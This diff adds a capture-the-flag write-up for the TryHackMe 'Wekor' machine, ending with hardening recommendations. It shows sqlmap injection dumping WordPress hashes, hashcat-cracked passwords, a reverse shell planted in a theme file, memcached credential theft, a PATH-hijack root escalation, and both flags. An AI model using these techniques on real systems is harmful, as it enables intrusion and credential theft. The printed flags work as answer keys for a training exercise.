add: writeup-ctf

content/writeup-ctf/writeup-wekor-thm/index.md

@@ -0,0 +1,220 @@
+---
+title: "Writeup - Wekor (THM)"
+date: 2022-04-17
+slug: "writeup-wekor-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Wekor](https://tryhackme.com/room/wekorra) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+## Exploit
+
+At first I start by listing the pages of the website.
+
+![](img/image-2.webp)
+
+I find a `robots.txt` file in which the following pages are listed:
+
+
+```bash
+User-agent: *
+Disallow: /workshop/
+Disallow: /root/
+Disallow: /lol/
+Disallow: /agent/
+Disallow: /feed
+Disallow: /crawler
+Disallow: /boot
+Disallow: /comingreallysoon
+Disallow: /interesting
+```
+While exploring I come across the following message:
+
+
+```bash
+Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot ! 
+```
+So there is a site hosted in the `it-next` next folder:
+
+![](img/image-3.webp)
+
+After some research I find an `Applie coupon` field on the `it_cart.php` page. I get a query using burp, then I run `sqlmap` to extract the database list.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ sqlmap -r request.txt --dbs --batch             
+        ___
+       __H__                                                                                                                                                                                                                                
+ ___ ___[(]_____ ___ ___  {1.6.4#stable}                                                                                                                                                                                                    
+|_ -| . [']     | .'| . |                                                                                                                                                                                                                   
+|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                                                   
+      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                           
+
+[...]
+web application technology: Apache 2.4.18
+back-end DBMS: MySQL >= 5.6
+[16:07:49] [INFO] fetching database names
+available databases [6]:
+[*] coupons
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] sys
+[*] wordpress
+
+[16:07:49] [INFO] fetched data logged to text files under '/home/d3vyce/.local/share/sqlmap/output/wekor.thm'
+
+[*] ending @ 16:07:49 /2022-04-13/
+```
+I find a `wordpress` database, I will try to extract it with the following command:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ sqlmap -r request.txt -D wordpress --dump --batch
+[...]
+[4 entries]
++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
+| ID   | user_url                        | user_pass                                   | user_email        | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key                           |
++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
+| 1    | http://site.wekor.thm/wordpress | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.          | admin@wekor.thm   | admin      | 0           | admin        | admin         | 2021-01-21 20:33:37 | <blank>                                       |
+| 5743 | http://jeffrey.com              | $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10          | jeffrey@wekor.thm | wp_jeffrey | 0           | wp jeffrey   | wp_jeffrey    | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
+| 5773 | http://yura.com                 | $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/          | yura@wekor.thm    | wp_yura    | 0           | wp yura      | wp_yura       | 2021-01-21 20:35:27 | <blank>                                       |
+| 5873 | http://eagle.com                | $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/ (xxxxxx) | eagle@wekor.thm   | wp_eagle   | 0           | wp eagle     | wp_eagle      | 2021-01-21 20:36:11 | <blank>                                       |
++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
+[...]
+```
+In the interval I find 4 user/password pairs. I put them in a file and I run `hashcat`.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ hashcat -m 400 hash wordlist/rockyou.txt
+[...]
+$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/:xxxxxx	(eagle)                 
+$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10:rockyou	(jeffrey)             
+$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/:soccer13	(yura)
+[...]
+```
+After a few seconds, we find all the passwords except the one of Admin. Now that we have credentials, we need to find the wordpress site; I launch a subdomain scan.
+
+![](img/image-4.webp)
+
+I find the `site` subdomain, I add it to the `/etc/hosts`, then I go to the site. On this page, I find the following text:
+
+
+```bash
+Hi there! 
+Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS! 
+- Jim 
+```
+This does not bring me much, so I launch a page scan on this subdomain.
+
+![](img/image-5.webp)
+
+After a few seconds I finally found the WordPress site!
+
+![](img/image-6.webp)
+
+So I go to the `wp-admin` page to connect to the admin panel. After trying the user `jeffrey`, I realize that he doesn't have admin permission, so I test the user `yura` and it works. I can now modify the content of the 404.php page of the twentytwentyone theme to add this [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php).
+
+By accessing the following page I execute the php code :
+
+
+```bash
+http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php
+```
+I now have a reverse shell, but I don't have access to the first flag.
+
+![](img/image-7.webp)
+
+So I look if I can't find a file with an interesting service to change the user. In the open ports, I find the port 11211 :
+
+![](img/image-8.webp)
+
+After some research I find the following page of the [HackTricks](https://book.hacktricks.xyz/pentesting/11211-memcache) blog. After some experimentation, I manage to get the credencials of the user Orka in the cache.
+
+![](img/image-9.webp)
+
+I can now change the user and get the first flag back.
+
+
+```bash
+Orka@osboxes:~$ cat user.txt
+cat user.txt
+1a26a6d51c0172400add0e297608dec6
+```
+## Privilege escalation
+
+I start by checking the user's authorization. Interestingly, my user has the right to run the `bitcoin` script with root rights.
+
+![](img/image-10.webp)
+
+I try to launch the script but without success, it needs a password to launch it.
+
+![](img/image-11.webp)
+
+So I try to extract the strings from the program and I find the following in the result:
+
+
+```bash
+Orka@osboxes:~/Desktop$ strings bitcoin
+[...]
+Enter the password : 
+password
+Access Denied... 
+Access Granted...
+                        User Manual:
+Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
+Amounts with more than one number will be stripped off! 
+And Lastly, be careful, everything is logged :) 
+Amount Of BitCoins : 
+ Sorry, This is not a valid amount! 
+python /home/Orka/Desktop/transfer.py %c
+[...]
+```
+The password to use the program would be `password` and then there is the execution of a python script. What is interesting is the use of python without using a relative route. This combined with the fact that I have write permissions in the `/usr/sbin/python` folder which is in the `$PATH` variable, I will be able to create a custom version of the python program.ndes suivante :
+
+
+```bash
+touch /usr/sbin/python
+echo '#!/bin/bash' > /usr/sbin/python
+echo '/bin/bash' >> /usr/sbin/python
+chmod +x /usr/sbin/python
+```
+I now run the `bitcoin` program with sudo and enter the password.
+
+![](img/image-12.webp)
+
+I am now root of the machine and I can get the last flag.
+
+
+```bash
+root@osboxes:~/Desktop# cat /root/root.txt
+cat /root/root.txt
+f4e788f87cc3afaecbaf0f0fe9ae6ad7
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Sanitizing Inputs must be implemented to avoid SQL injections
+- Use strong passwords
+- Set up Memcached authentication
+- Use absolute paths when using programs in scripts